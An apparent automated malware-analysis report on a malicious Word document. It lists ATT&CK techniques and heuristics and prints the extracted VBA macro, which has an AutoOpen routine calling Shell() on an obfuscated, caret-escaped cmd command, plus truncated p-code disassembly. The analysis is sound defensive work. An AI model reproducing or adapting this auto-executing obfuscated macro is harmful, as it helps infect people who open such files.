Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, which is a common technique for downloading and executing further malicious content. The obfuscated nature of the command string suggests an attempt to evade detection.
Heuristics (6)

- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30719 bytes |

SHA-256: 5c85c3b59651e5c1fffb27343811907d747cefd1901788fd7131491a8d67974c

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "QWAVCmbWUGi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jIOiqzzJmz"
Sub AutoOpen()
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
On Error Resume Next
Error FBQcU * 60419 * bQntPO / ODzWO
Error GoAzh * kwWsUq
Error 96578 * wrzKr / 70060 * KQitA
awOdviwZVWk = Shell(ChrW(10 + 2 + 12 + 2 + 41) + zrwRkijVntwt + ENBSYUbJQbWRv + qInVro + DOTEiQSoc + iTTisQuKawY + BrOiAHAi + DsJFIMC + WmbRTDZfDuD + AzQUmXzlUvmSLn, 875529044 - 875529044)
Error wYVdjJ * LBfXN / 87405 * qpwIQ
Error 20640 / bUVEi * 84663 * solUDW
Error vSiWq / HXcwm
End Sub
' Processing file: /opt/analyzer/scan_staging/03fbcd7780264042a856f7198350edf1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/QWAVCmbWUGi - 1109 bytes
' Macros/VBA/vlIoOfNZCBLsbf - 17225 bytes
' Line #0:
'   FuncDefn (Function qInVro())
' Line #1:
'   OnError (Resume Next)
' Line #2:
' Line #3:
'   OnError (Resume Next)
' Line #4:
' Line #5:
'   OnError (Resume Next)
' Line #6:
' Line #7:
'   OnError (Resume Next)
' Line #8:
'   Ld jVpRhX
'   Ld nUcdsa
'   Div
'   Error
' Line #9:
'   LitDI2 0x1C77
'   LitDI2 0x4FA7
'   Div
'   Error
' Line #10:
'   LitStr 0x0005 "Md /"
'   LitStr 0x0004 "v/r "
'   Add
'   LitDI2 0x0000
'   LitDI2 0x0004
'   Add
'   LitDI2 0x0003
'   Add
'   LitDI2 0x0001
'   Add
'   LitDI2 0x001A
'   Add
'   ArgsLd Chr 0x0001
'   Add
'   LitStr 0x0002 " ^"
'   Add
'   LitStr 0x0004 "sE^T"
'   Add
'   LitStr 0x0001 " "
'   Add
'   LitStr 0x0002 "^ "
'   Add
'   LitStr 0x0006 "^h^q^x"
'   Add
'   LitStr 0x0003 "==^"
'   Add
'   LitStr 0x0002 "=^"
'   Add
'   LitStr 0x0001 "A"
'   Add
'   LitStr 0x0006 "^Ag^AA"
'   Add
'   LitStr 0x0004 "^I^A"
'   Add
'   St BZMwQiNFZWq
' Line #11:
'   Ld tMCaD
'   LitDI4 0xE6D5 0x0000
'   Mul
'   LitDI2 0x3A5A
'   Mul
'   Ld QQGqqL
'   Mul
'   Error
' Line #12:
'   Ld OijvB
'   LitDI2 0x1CB2
'   Div
'   Ld sLjQt
'   Mul
'   Ld pvvMZi
'   Mul
'   Error
' Line #13:
'   LitDI4 0xDECF 0x0000
'   Ld zfPzGA
'   Mul
'   LitDI2 0x354C
'   Div
'   Ld zihijA
'   Mul
'   Error
' Line #14:
'   LitDI4 0x3529 0x0001
'   LitDI4 0x81F4 0x0001
'   Mul
'   LitDI4 0x9F6C 0x0000
'   Div
'   Ld iVwZw
'   Div
'   Error
' Line #15:
'   LitStr 0x0005 "ACA^g"
'   LitStr 0x0004 "^AA^"
'   Add
'   LitStr 0x0002 "IA"
'   Add
'   LitStr 0x0006 "AC^A^g"
'   Add
'   LitStr 0x0006 "^AAIAA"
'   Add
'   LitStr 0x0004 "C^A^"
'   Add
'   LitStr 0x0006 "gA^A^I"
'   Add
'   LitStr 0x0007 "^A^ACAg"
'   Add
'   LitStr 0x0003 "^AA"
'   Add
'   St zDSBClTWPi
' Line #16:
'   Ld cmLup
'   Ld AaBkP
'   Div
'   Error
' Line #17:
'   LitDI2 0x7F29
'   Ld CzdWR
'   Div
'   LitDI4 0x055A 0x0001
'   Mul
'   LitDI4 0xD62A 0x0000
'   Mul
'   Error
' Line #18:
'   Ld rqFwI
'   Ld GQpMjw
'   Div
'   Ld zAKQzX
'   Mul
'   Ld kWiHjf
'   Mul
'   Error
' Line #19:
'   LitDI4 0xBBA9 0x0000
'   LitDI4 0xB242 0x0000
'   Div
'   Error
' Line #20:
'   LitStr 0x0003 "^I^"
'   LitStr 0x0006 "AACAgA"
'   Add
'   LitStr 0x0002 "^A"
'   Add
'   LitStr 0x0002 "I^"
'   Add
'   LitStr 0x0007 "A^0^H^A"
'   Add
'   St jcjuv
' Line #21:
'   Ld mBImQ
'   LitDI4 0x8D6B 0x0000
'   Mul
'   LitDI4 0xC5D7 0x0000
'   Div
'   Ld tnnacw
'   Div
'   Error
' Line #22:
'   LitStr 0x0003 "9Bw"
'   LitStr 0x0006 "^e^Ag^"
'   Add
'   LitStr 0x0004 "G^Aj"
'   Add
'   LitStr 0x0005 "BA^dA"
'   Add
'   LitStr 0x0001 "E"
'   Add
'   LitStr 0x0003 "GA^"
'   Add
'   LitStr 0x0001 "j"
'   Add
'   LitStr 0x0003 "BQf"
'   Add
'   LitStr 0x0002 "^A"
'   Add
'   LitStr 0x0007 "s^D^ArB"
'   Add
'   LitStr 0x0007 "^QYA^UG"
'   Add
'   LitStr 0x0005 "^Ay^B"
'   Add
'   St WdMbk
' Line #23:
'   LitDI4 0x1B58 0x0001
'   Ld jZIUW
'   Mul
'   LitDI2 0x44BE
'   Mul
'   Ld joiRDz
'   Div
'   Error
' Line #24:
'   LitDI4 0x5E22 0x0001
'   Ld XupwjI
'   Mul
'   Error
' Line # ... (truncated)
```